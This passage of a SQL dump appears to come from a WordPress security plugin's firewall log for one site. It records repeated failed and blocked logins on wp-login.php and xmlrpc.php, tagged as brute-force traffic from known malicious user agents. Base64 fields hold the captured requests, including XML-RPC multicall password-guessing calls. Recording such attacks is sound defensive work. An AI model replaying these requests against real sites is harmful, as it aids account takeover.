User-Agents','{\"learningMode\":1,\"failedRules\":[307],\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96aWxsYS81LjAgKFgxMTsgVWJ1bnR1OyBMaW51eCB4ODZfNjQ7IHJ2OjYyLjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNjIuMA==\",\"category\":\"brute-force\",\"ssl\":true,\"fullRequest\":\"UE9TVCAvd3AtbG9naW4ucGhwIEhUVFAvMS4xClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChYMTE7IFVidW50dTsgTGludXggeDg2XzY0OyBydjo2Mi4wKSBHZWNrby8yMDEwMDEwMSBGaXJlZm94LzYyLjAKSG9zdDogZ3N3MjAyMy5jb20KQWNjZXB0LUVuY29kaW5nOiBnemlwCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkCkNvbnRlbnQtTGVuZ3RoOiAxMDkKQ29ubmVjdGlvbjogY2xvc2UKCmxvZz0lNUJyZWRhY3RlZCU1RCZwd2Q9JTVCcmVkYWN0ZWQlNUQmd3Atc3VibWl0PUxvZytJbiZyZWRpcmVjdF90bz1odHRwcyUzQSUyRiUyRmdzdzIwMjMuY29tJTJGd3AtYWRtaW4lMkYmdGVzdGNvb2tpZT0x\"}'),
(45,0.000000,1691939727.591892,'\0\0\0\0\0\0\0\0\0\0#',0,200,0,1,0,'https://gsw2023.com/xmlrpc.php','','Mozilla/5.0 (Linux; Android 10; SM-A205U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Mobile Safari/537.36','loginFailValidUsername',NULL,NULL),
(46,1691939730.756300,1691939730.499948,'\0\0\0\0\0\0\0\0\0\0PPԪ',0,200,0,0,0,'https://gsw2023.com/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername','Known malicious User-Agents','{\"learningMode\":1,\"failedRules\":[307],\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96aWxsYS81LjAgKFgxMTsgVWJ1bnR1OyBMaW51eCB4ODZfNjQ7IHJ2OjYyLjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNjIuMA==\",\"category\":\"brute-force\",\"ssl\":true,\"fullRequest\":\"UE9TVCAveG1scnBjLnBocCBIVFRQLzEuMQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoWDExOyBVYnVudHU7IExpbnV4IHg4Nl82NDsgcnY6NjIuMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC82Mi4wCkhvc3Q6IGdzdzIwMjMuY29tCkFjY2VwdC1FbmNvZGluZzogZ3ppcApDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZApDb250ZW50LUxlbmd0aDogNDg1CkNvbm5lY3Rpb246IGNsb3NlCgolM0MlM0Z4bWwrdmVyc2lvbiUzRCUyMjEuMCUyMiUzRiUzRSUwQSUzQ21ldGhvZENhbGwlM0UlM0NtZXRob2ROYW1lJTNFc3lzdGVtLm11bHRpY2FsbCUzQyUyRm1ldGhvZE5hbWUlM0UlM0NwYXJhbXMlM0UlM0NwYXJhbSUzRSUzQ3ZhbHVlJTNFJTNDYXJyYXklM0UlM0NkYXRhJTNFJTNDdmFsdWUlM0UlM0NzdHJ1Y3QlM0UlM0NtZW1iZXIlM0UlM0NuYW1lJTNFbWV0aG9kTmFtZSUzQyUyRm5hbWUlM0UlM0N2YWx1ZSUzRSUzQ3N0cmluZyUzRXdwLmdldFVzZXJzQmxvZ3MlM0MlMkZzdHJpbmclM0UlM0MlMkZ2YWx1ZSUzRSUzQyUyRm1lbWJlciUzRSUzQ21lbWJlciUzRSUzQ25hbWUlM0VwYXJhbXMlM0MlMkZuYW1lJTNFJTNDdmFsdWUlM0UlM0NhcnJheSUzRSUzQ2RhdGElM0UlM0N2YWx1ZSUzRSUzQ2FycmF5JTNFJTNDZGF0YSUzRSUzQyUyRmRhdGElM0UlM0MlMkZhcnJheSUzRSUzQyUyRnZhbHVlJTNFJTNDJTJGZGF0YSUzRSUzQyUyRmFycmF5JTNFJTNDJTJGdmFsdWUlM0UlM0MlMkZtZW1iZXIlM0UlM0MlMkZzdHJ1Y3QlM0UlM0MlMkZ2YWx1ZSUzRSUzQyUyRmRhdGElM0UlM0MlMkZhcnJheSUzRSUzQyUyRnZhbHVlJTNFJTNDJTJGcGFyYW0lM0UlM0MlMkZwYXJhbXMlM0UlM0MlMkZtZXRob2RDYWxsJTNF\"}'),
(47,0.000000,1691939731.157516,'\0\0\0\0\0\0\0\0\0\0>',0,200,0,1,0,'https://gsw2023.com/xmlrpc.php','','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0','loginFailValidUsername',NULL,NULL),
(48,0.000000,1691939733.836552,'\0\0\0\0\0\0\0\0\0\0Yj7',0,200,0,1,0,'https://gsw2023.com/xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36','loginFailValidUsername',NULL,NULL),
(49,0.000000,1691939736.648671,'\0\0\0\0\0\0\0\0\0\0Yj7',0,200,0,1,0,'https://gsw2023.com/xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36','loginFailValidUsername',NULL,NULL),
(50,0.000000,1691939737.337321,'\0\0\0\0\0\0\0\0\0\0>',0,200,0,1,0,'https://gsw2023.com/xmlrpc.php','','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0','loginFailValidUsername',NULL,NULL),
(51,0.000000,1691939748.613077,'\0\0\0\0\0\0\0\0\0\0g',0,503,0,0,0,'https://gsw2023.com/xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),
(52,0.000000,1691939752.418352,'\0\0\0\0\0\0\0\0\0\0+h',0,200,0,1,0,'https://gsw2023.com/xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0','loginFailValidUsername',NULL,NULL),
(53,0.000000,1691939754.476198,'\0\0\0\0\0\0\0\0\0\0+h',0,200,0,1,0,'https://gsw2023.com/xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36','loginFailValidUsername',NULL,NULL),
(54,0.000000,1691939755.725311,'\0\0\0\0\0\0\0\0\0\0+h',0,200,0,1,0,'https://gsw2023.com/xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0','loginFailValidUsername',NULL,NULL),
(55,0.000000,1691939757.363164,'\0\0\0\0\0\0\0\0\0\0+h',0,200,0,1,0,'https://gsw2023.com/xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36','loginFailValidUsername',NULL,NULL),
(56,0.000000,1691939765.538548,'\0\0\0\0\0\0\0\0\0\0a',0,200,0,1,0,'https://gsw2023.com/xmlrpc.php','','Mozilla/5.0 (Linux; Android 10; LM-X420) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Mobile Safari/537.36','loginFailValidUsername',NULL,NULL),
(57,0.000000,1691939765.173587,'\0\0\0\0\0\0\0\0\0\0z|<',0,200,0,1,0,'https://gsw2023.com/xmlrpc.php','','Mozilla/5.0 (Linux; Android 10; LM-Q710(FGN)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Mobile Safari/537.36','loginFailValidUsername',NULL,NULL),
(58,0.000000,1691939767.797274,'\0\0\0\0\0\0\0\0\0\0a',0,200,0,1,0,'https://gsw2023.com/xmlrpc.php','','Mozilla/5.0 (Linux; Android 10; LM-X420) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Mobile Safari/537.36','loginFailValidUsername',NULL,NULL),
(59,0.000000,1691939769.337534,'\0\0\0\0\0\0\0\0\0\0z|<',0,200,0,1,0,'https://gsw2023.com/xmlrpc.php','','Mozilla/5.0 (Linux; Android 10; LM-Q710(FGN)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Mobile Safari/537.36','loginFailValidUsername',NULL,NULL),
(60,0.000000,1691939785.423627,'\0\0\0\0\0\0\0\0\0\0#',0,200,0,1,0,'https://gsw2023.com/xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0','loginFailValidUsername',NULL,NULL),
(61,0.000000,1691939787.708249,'\0\0\0\0\0\0\0\0\0\0#',0,200,0,1,0,'https://gsw2023.com/xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0','loginFailValidUsername',NULL,NULL),
(62,1691939908.566600,1691939908.309240,'\0\0\0\0\0\0\0\0\0\0g*',0,200,0,0,0,'https://gsw2023.com/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','learned:waf','Known malicious User-Agents','{\"learningMode\":1,\"failedRules\":[307],\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96aWxsYS81LjAgKFgxMTsgVWJ1bnR1OyBMaW51eCB4ODZfNjQ7IHJ2OjYyLjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNjIuMA==\",\"category\":\"brute-force\",\"ssl\":true}'),
(63,1691939913.373700,1691939913.089607,'\0\0\0\0\0\0\0\0\0\0g*',0,503,0,0,0,'https://gsw2023.com/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network','{\"learningMode\":1,\"failedRules\":[307],\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96aWxsYS81LjAgKFgxMTsgVWJ1bnR1OyBMaW51eCB4ODZfNjQ7IHJ2OjYyLjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNjIuMA==\",\"category\":\"brute-force\",\"ssl\":true,\"fullRequest\":\"UE9TVCAvd3AtbG9naW4ucGhwIEhUVFAvMS4xClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChYMTE7IFVidW50dTsgTGludXggeDg2XzY0OyBydjo2Mi4wKSBHZWNrby8yMDEwMDEwMSBGaXJlZm94LzYyLjAKSG9zdDogZ3N3MjAyMy5jb20KQ29va2llOiB3b3JkcHJlc3NfdGVzdF9jb29raWU9V1ArQ29va2llK2NoZWNrOwpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAKQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQKQ29udGVudC1MZW5ndGg6IDk3CkNvbm5lY3Rpb246IGNsb3NlCgpsb2c9JTVCcmVkYWN0ZWQlNUQmcHdkPSU1QnJlZGFjdGVkJTVEJndwLXN1Ym1pdD1Mb2crSW4mcmVkaXJlY3RfdG89aHR0cHMlM0ElMkYlMkZnc3cyMDIzLmNvbSUyRndwLWFkbWluJTJGJnRlc3Rjb29raWU9MQ==\"}'),
(64,1691940114.913600,1691940114.664813,'\0\0\0\0\0\0\0\0\0\0D/6',0,200,0,0,0,'https://gsw2023.com/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','learned:waf','Known malicious User-Agents','{\"learningMode\":1,\"failedRules\":[307],\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96aWxsYS81LjAgKFgxMTsgVWJ1bnR1OyBMaW51eCB4ODZfNjQ7IHJ2OjYyLjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNjIuMA==\",\"category\":\"brute-force\",\"ssl\":true}'),
(65,1691940116.758300,1691940116.493523,'\0\0\0\0\0\0\0\0\0\0D/6',0,200,0,1,0,'https://gsw2023.com/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername','Known malicious User-Agents','{\"learningMode\":1,\"failedRules\":[307],\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96aWxsYS81LjAgKFgxMTsgVWJ1bnR1OyBMaW51eCB4ODZfNjQ7IHJ2OjYyLjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNjIuMA==\",\"category\":\"brute-force\",\"ssl\":true,\"fullRequest\":\"UE9TVCAvd3AtbG9naW4ucGhwIEhUVFAvMS4xClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChYMTE7IFVidW50dTsgTGludXggeDg2XzY0OyBydjo2Mi4wKSBHZWNrby8yMDEwMDEwMSBGaXJlZm94LzYyLjAKSG9zdDogZ3N3MjAyMy5jb20KQ29va2llOiB3b3JkcHJlc3NfdGVzdF9jb29raWU9V1ArQ29va2llK2NoZWNrOwpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAKQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQKQ29udGVudC1MZW5ndGg6IDk5CkNvbm5lY3Rpb246IGNsb3NlCgpsb2c9JTVCcmVkYWN0ZWQlNUQmcHdkPSU1QnJlZGFjdGVkJTVEJndwLXN1Ym1pdD1Mb2crSW4mcmVkaXJlY3RfdG89aHR0cHMlM0ElMkYlMkZnc3cyMDIzLmNvbSUyRndwLWFkbWluJTJGJnRlc3Rjb29raWU9MQ==\"}'),
(66,1691940118.922800,1691940118.664116,'\0\0\0\0\0\0\0\0\0\0D/6',0,200,0,0,0,'https://gsw2023.com/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername','Known malicious User-Agents','{\"learningMode\":1,\"failedRules\":[307],\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96aWxsYS81LjAgKFgxMTsgVWJ1bnR1OyBMaW51eCB4ODZfNjQ7IHJ2OjYyLjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNjIuMA==\",\"category\":\"brute-force\",\"ssl\":true,\"fullRequest\":\"UE9TVCAveG1scnBjLnBocCBIVFRQLzEuMQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoWDExOyBVYnVudHU7IExpbnV4IHg4Nl82NDsgcnY6NjIuMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC82Mi4wCkhvc3Q6IGdzdzIwMjMuY29tCkFjY2VwdC1FbmNvZGluZzogZ3ppcApDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZApDb250ZW50LUxlbmd0aDogNDc1CkNvbm5lY3Rpb246IGNsb3NlCgolM0MlM0Z4bWwrdmVyc2lvbiUzRCUyMjEuMCUyMiUzRiUzRSUwQSUzQ21ldGhvZENhbGwlM0UlM0NtZXRob2ROYW1lJTNFc3lzdGVtLm11bHRpY2FsbCUzQyUyRm1ldGhvZE5hbWUlM0UlM0NwYXJhbXMlM0UlM0NwYXJhbSUzRSUzQ3ZhbHVlJTNFJTNDYXJyYXklM0UlM0NkYXRhJTNFJTNDdmFsdWUlM0UlM0NzdHJ1Y3QlM0UlM0NtZW1iZXIlM0UlM0NuYW1lJTNFbWV0aG9kTmFtZSUzQyUyRm5hbWUlM0UlM0N2YWx1ZSUzRSUzQ3N0cmluZyUzRXdwLmdldFVzZXJzQmxvZ3MlM0MlMkZzdHJpbmclM0UlM0MlMkZ2YWx1ZSUzRSUzQyUyRm1lbWJlciUzRSUzQ21lbWJlciUzRSUzQ25hbWUlM0VwYXJhbXMlM0MlMkZuYW1lJTNFJTNDdmFsdWUlM0UlM0NhcnJheSUzRSUzQ2RhdGElM0UlM0N2YWx1ZSUzRSUzQ2FycmF5JTNFJTNDZGF0YSUzRSUzQyUyRmRhdGElM0UlM0MlMkZhcnJheSUzRSUzQyUyRnZhbHVlJTNFJTNDJTJGZGF0YSUzRSUzQyUyRmFycmF5JTNFJTNDJTJGdmFsdWUlM0UlM0MlMkZtZW1iZXIlM0UlM0MlMkZzdHJ1Y3QlM0UlM0MlMkZ2YWx1ZSUzRSUzQyUyRmRhdGElM0UlM0MlMkZhcnJheSUzRSUzQyUyRnZhbHVlJTNFJTNDJTJGcGFyYW0lM0UlM0MlMkZwYXJhbXMlM0UlM0MlMkZtZXRob2RDYWxsJTNF\"}'),
(67,0.000000,1691940143.984799,'\0\0\0\0\0\0\0\0\0\0՘',0,503,0,0,0,'https://gsw2023.com/xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),
(68,1691940291.650600,1691940291.388468,'\0\0\0\0\0\0\0\0\0\0#',0,200,0,0,0,'https://gsw2023.com/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','learned:waf','Known malicious User-Agents','{\"learningMode\":1,\"failedRules\":[307],\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96aWxsYS81LjAgKFgxMTsgVWJ1bnR1OyBMaW51eCB4ODZfNjQ7IHJ2OjYyLjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNjIuMA==\",\"category\":\"brute-force\",\"ssl\":true}'),
(69,1691940293.491300,1691940293.208784,'\0\0\0\0\0\0\0\0\0\0#',0,200,0,1,0,'https://gsw2023.com/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername','Known malicious User-Agents','{\"learningMode\":1,\"failedRules\":[307],\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96aWxsYS81LjAgKFgxMTsgVWJ1bnR1OyBMaW51eCB4ODZfNjQ7IHJ2OjYyLjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNjIuMA==\",\"category\":\"brute-force\",\"ssl\":true,\"fullRequest\":\"UE9TVCAvd3AtbG9naW4ucGhwIEhUVFAvMS4xClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChYMTE7IFVidW50dTsgTGludXggeDg2XzY0OyBydjo2Mi4wKSBHZWNrby8yMDEwMDEwMSBGaXJlZm94LzYyLjAKSG9zdDogZ3N3MjAyMy5jb20KQ29va2llOiB3b3JkcHJlc3NfdGVzdF9jb29raWU9V1ArQ29va2llK2NoZWNrOwpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAKQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQKQ29udGVudC1MZW5ndGg6IDk4CkNvbm5lY3Rpb246IGNsb3NlCgpsb2c9JTVCcmVkYWN0ZWQlNUQmcHdkPSU1QnJlZGFjdGVkJTVEJndwLXN1Ym1pdD1Mb2crSW4mcmVkaXJlY3RfdG89aHR0cHMlM0ElMkYlMkZnc3cyMDIzLmNvbSUyRndwLWFkbWluJTJGJnRlc3Rjb29raWU9MQ==\"}'),
(70,1691940295.672200,1691940295.424718,'\0\0\0\0\0\0\0\0\0\0#',0,200,0,0,0,'https://gsw2023.com/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername','Known malicious User-Agents','{\"learningMode\":1,\"failedRules\":[307],\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96aWxsYS81LjAgKFgxMTsgVWJ1bnR1OyBMaW51eCB4ODZfNjQ7IHJ2OjYyLjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNjIuMA==\",\"category\":\"brute-force\",\"ssl\":true,\"fullRequest\":\"UE9TVCAveG1scnBjLnBocCBIVFRQLzEuMQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoWDExOyBVYnVudHU7IExpbnV4IHg4Nl82NDsgcnY6NjIuMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC82Mi4wCkhvc3Q6IGdzdzIwMjMuY29tCkFjY2VwdC1FbmNvZGluZzogZ3ppcApDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZApDb250ZW50LUxlbmd0aDogNDc0CkNvbm5lY3Rpb246IGNsb3NlCgolM0MlM0Z4bWwrdmVyc2lvbiUzRCUyMjEuMCUyMiUzRiUzRSUwQSUzQ21ldGhvZENhbGwlM0UlM0NtZXRob2ROYW1lJTNFc3lzdGVtLm11bHRpY2FsbCUzQyUyRm1ldGhvZE5hbWUlM0UlM0NwYXJhbXMlM0UlM0NwYXJhbSUzRSUzQ3ZhbHVlJTNFJTNDYXJyYXklM0UlM0NkYXRhJTNFJTNDdmFsdWUlM0UlM0NzdHJ1Y3QlM0UlM0NtZW1iZXIlM0UlM0NuYW1lJTNFbWV0aG9kTmFtZSUzQyUyRm5hbWUlM0UlM0N2YWx1ZSUzRSUzQ3N0cmluZyUzRXdwLmdldFVzZXJzQmxvZ3MlM0MlMkZzdHJpbmclM0UlM0MlMkZ2YWx1ZSUzRSUzQyUyRm1lbWJlciUzRSUzQ21lbWJlciUzRSUzQ25hbWUlM0VwYXJhbXMlM0MlMkZuYW1lJTNFJTNDdmFsdWUlM0UlM0NhcnJheSUzRSUzQ2RhdGElM0UlM0N2YWx1ZSUzRSUzQ2FycmF5JTNFJTNDZGF0YSUzRSUzQyUyRmRhdGElM0UlM0MlMkZhcnJheSUzRSUzQyUyRnZhbHVlJTNFJTNDJTJGZGF0YSUzRSUzQyUyRmFycmF5JTNFJTNDJTJGdmFsdWUlM0UlM0MlMkZtZW1iZXIlM0UlM0MlMkZzdHJ1Y3QlM0UlM0MlMkZ2YWx1ZSUzRSUzQyUyRmRhdGElM0UlM0MlMkZhcnJheSUzRSUzQyUyRnZhbHVlJTNFJTNDJTJGcGFyYW0lM0UlM0MlMkZwYXJhbXMlM0UlM0MlMkZtZXRob2RDYWxsJTNF\"}'),
(71,1691940429.660900,1691940429.405008,'\0\0\0\0\0\0\0\0\0\0\rgS',0,200,0,0,0,'https://gsw2023.com/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','learned:waf','Known malicious User-Agents','{\"learningMode\":1,\"failedRules\":[307],\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96aWxsYS81LjAgKFgxMTsgVWJ1bnR1OyBMaW51eCB4ODZfNjQ7IHJ2OjYyLjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNjIuMA==\",\"category\":\"brute-force\",\"ssl\":true}'),
(72,1691940431.566900,1691940431.309000,'\0\0\0\0\0\0\0\0\0\0\rgS',0,200,0,1,0,'https://gsw2023.com/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername','Known malicious User-Agents','{\"learningMode\":1,\"failedRules\":[307],\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96aWxsYS81LjAgKFgxMTsgVWJ1bnR1OyBMaW51eCB4ODZfNjQ7IHJ2OjYyLjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNjIuMA==\",\"category\":\"brute-force\",\"ssl\":true,\"fullRequest\":\"UE9TVCAvd3AtbG9naW4ucGhwIEhUVFAvMS4xClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChYMTE7IFVidW50dTsgTGludXggeDg2XzY0OyBydjo2Mi4wKSBHZWNrby8yMDEwMDEwMSBGaXJlZm94LzYyLjAKSG9zdDogZ3N3MjAyMy5jb20KQ29va2llOiB3b3JkcHJlc3NfdGVzdF9jb29raWU9V1ArQ29va2llK2NoZWNrOwpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAKQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQKQ29udGVudC1MZW5ndGg6IDEwMApDb25uZWN0aW9uOiBjbG9zZQoKbG9nPSU1QnJlZGFjdGVkJTVEJnB3ZD0lNUJyZWRhY3RlZCU1RCZ3cC1zdWJtaXQ9TG9nK0luJnJlZGlyZWN0X3RvPWh0dHBzJTNBJTJGJTJGZ3N3MjAyMy5jb20lMkZ3cC1hZG1pbiUyRiZ0ZXN0Y29va2llPTE=\"}'),
(73,1691940433.893500,1691940433.572435,'\0\0\0\0\0\0\0\0\0\0\rgS',0,200,0,0,0,'https://gsw2023.com/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername','Known malicious User-Agents','{\"learningMode\":1,\"failedRules\":[307],\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96aWxsYS81LjAgKFgxMTsgVWJ1bnR1OyBMaW51eCB4ODZfNjQ7IHJ2OjYyLjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNjIuMA==\",\"category\":\"brute-force\",\"ssl\":true,\"fullRequest\":\"UE9TVCAveG1scnBjLnBocCBIVFRQLzEuMQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoWDExOyBVYnVudHU7IExpbnV4IHg4Nl82NDsgcnY6NjIuMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC82Mi4wCkhvc3Q6IGdzdzIwMjMuY29tCkFjY2VwdC1FbmNvZGluZzogZ3ppcApDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZApDb250ZW50LUxlbmd0aDogNDc1CkNvbm5lY3Rpb246IGNsb3NlCgolM0MlM0Z4bWwrdmVyc2lvbiUzRCUyMjEuMCUyMiUzRiUzRSUwQSUzQ21ldGhvZENhbGwlM0UlM0NtZXRob2ROYW1lJTNFc3lzdGVtLm11bHRpY2FsbCUzQyUyRm1ldGhvZE5hbWUlM0UlM0NwYXJhbXMlM0UlM0NwYXJhbSUzRSUzQ3ZhbHVlJTNFJTNDYXJyYXklM0UlM0NkYXRhJTNFJTNDdmFsdWUlM0UlM0NzdHJ1Y3QlM0UlM0NtZW1iZXIlM0UlM0NuYW1lJTNFbWV0aG9kTmFtZSUzQyUyRm5hbWUlM0UlM0N2YWx1ZSUzRSUzQ3N0cmluZyUzRXdwLmdldFVzZXJzQmxvZ3MlM0MlMkZzdHJpbmclM0UlM0MlMkZ2YWx1ZSUzRSUzQyUyRm1lbWJlciUzRSUzQ21lbWJlciUzRSUzQ25hbWUlM0VwYXJhbXMlM0MlMkZuYW1lJTNFJTNDdmFsdWUlM0UlM0NhcnJheSUzRSUzQ2RhdGElM0UlM0N2YWx1ZSUzRSUzQ2FycmF5JTNFJTNDZGF0YSUzRSUzQyUyRmRhdGElM0UlM0MlMkZhcnJheSUzRSUzQyUyRnZhbHVlJTNFJTNDJTJGZGF0YSUzRSUzQyUyRmFycmF5JTNFJTNDJTJGdmFsdWUlM0UlM0MlMkZtZW1iZXIlM0UlM0MlMkZzdHJ1Y3QlM0UlM0MlMkZ2YWx1ZSUzRSUzQyUyRmRhdGElM0UlM0MlMkZhcnJheSUzRSUzQyUyRnZhbHVlJTNFJTNDJTJGcGFyYW0lM0UlM0MlMkZwYXJhbXMlM0UlM0MlMkZtZXRob2RDYWxsJTNF\"}'),
(74,0.000000,1691940568.709540,'\0\0\0\0\0\0\0\0\0\0hZ',0,503,0,0,0,'https://gsw2023.com/xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),
(75,1691940597.617400,1691940597.352239,'\0\0\0\0\0\0\0\0\0\0Y',0,200,0,0,0,'https://gsw2023.com/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','learned:waf','Known malicious User-Agents','{\"learningMode\":1,\"failedRules\":[307],\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96aWxsYS81LjAgKFgxMTsgVWJ1bnR1OyBMaW51eCB4ODZfNjQ7IHJ2OjYyLjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNjIuMA==\",\"category\":\"brute-force\",\"ssl\":true}'),
